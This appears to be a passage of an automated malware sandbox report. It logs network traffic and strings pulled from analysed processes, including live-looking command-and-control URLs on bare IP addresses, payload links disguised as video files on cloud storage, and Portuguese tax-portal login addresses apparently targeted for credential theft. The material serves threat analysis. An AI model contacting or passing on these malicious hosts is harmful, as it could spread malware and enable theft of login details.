Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /41907bc4-chronocromdocrom/integra/conf.txt HTTP/1.1User-Agent: ler4151.txtHost: s3.timeweb.comIf-Modified-Since: Mon, 30 Oct 2023 15:08:01 GMTIf-None-Match: "8cc325c4a72b846a690145124f81749a"
Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /41907bc4-chronocromdocrom/integra/conf.txt HTTP/1.1User-Agent: ler2195.txtHost: s3.timeweb.comIf-Modified-Since: Mon, 30 Oct 2023 15:08:01 GMTIf-None-Match: "8cc325c4a72b846a690145124f81749a"
Source: global trafficDNS traffic detected: DNS query: privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: www.acesso.gov.pt
Source: global trafficDNS traffic detected: DNS query: static.portaldasfinancas.gov.pt
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.portaldasfinancas.gov.pt
Source: global trafficDNS traffic detected: DNS query: happychristmaslegado.s3.eu-north-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: s3.timeweb.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 13:59:55 GMTX-Frame-Options: SAMEORIGINContent-Length: 315Content-Type: text/html; charset=iso-8859-1Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomainsSet-Cookie: AT_P=!uQTuTYfOdmp4l5iXNCYICHCNuUpMaeEZ4wzloG6HQNB+tifpD1BMCIL85dQ+gBTJbL0POc/AMS+tJuA=; path=/; Httponly; Secure; SameSite=strictSet-Cookie: TS01bc69dc=01e43c52fe02e876414b488368fbd5750f7a8763a3f38f477fe50b2da2ba10c916a4e119ebde3f6846260fb1b396afeabd0dbfebaa; Path=/; Secure; HTTPOnlySet-Cookie: TS7d2bcbce027=08def0a5edab200057f1248157f3b8841b251fc39b1b6e1bf75c4ec867a31b2f64e663decd9af72a089dd318321130009a4753c39781e5dd5506ed5fe4b51845d08cb401546f81e3bc806e4ebb2ab6d43164d63fc5daddfacf3ef06f9732c57e; Secure; Path=/Vary: Accept-Encoding
Source: place.exe, 00000008.00000000.2060052919.0000000000BE3000.00000002.00000001.01000000.0000000D.sdmp, place.exe, 00000008.00000002.2972396912.000001477F56A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://185.178.46.42/vo/
Source: place.exe, 00000008.00000002.2967068820.00000002F938A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.178.46.42/vo/U
Source: lspcv2.exe, 00000009.00000002.2982463608.00000145E4A0A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://94.241.141.101/dm4/
Source: lspcv2.exe, 00000009.00000002.2982463608.00000145E49BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://94.241.141.101/dm4/publi.php
Source: lspcv2.exe, 00000009.00000002.2982463608.00000145E4A03000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://94.241.141.101/dm4/publi.php03
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFAC1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp, artigo.exe, 00000005.00000002.2976258249.0000020EFAC42000.00000004.00000020.00020000.00000000.sdmp, artigo.exe, 00000005.00000003.2083615098.0000020EFAC40000.00000004.00000020.00020000.00000000.sdmp, artigo.exe, 00000005.00000002.2978883513.0000020EFC4BD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp43
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4B
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/alphaville.mp4C
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmp, artigo.exe, 00000005.00000002.2978883513.0000020EFC4BD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4%
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp401
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4Y
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://happychristmaslegado.s3.eu-north-1.amazonaws.com/basketchampion.mp4bif
Source: wscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heapanalytics.com
Source: wscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heapanalytics.com/css/ved.css
Source: wscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heapanalytics.com/js/ved.css
Source: wscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://heapanalytics.com/js/ved.js
Source: wscript.exe, wscript.exe, 00000000.00000003.1830358182.000002232986E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1831533016.000002232986E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/prefere
Source: wscript.exe, 00000000.00000003.1803487559.0000022321A63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/preferencia.cdr
Source: wscript.exe, 00000000.00000003.1803487559.0000022321A63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com/preferencia.cdrIVE=C
Source: place.exe, 00000008.00000000.2060052919.0000000000BE3000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://s3.timeweb.com/41907bc4-chronocromdocrom/one/cnf.txt
Source: wscript.exe, 00000000.00000003.1889781026.00000223257A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1682280484.0000022323832000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1831533016.000002232986E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1682753596.0000022324BE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1803487559.0000022321A63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1681815966.000002232440C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
Source: wscript.exe, 00000000.00000003.1684071613.0000022321D2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardc
Source: wscript.exe, 00000000.00000003.1803487559.0000022321A63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardrvc
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
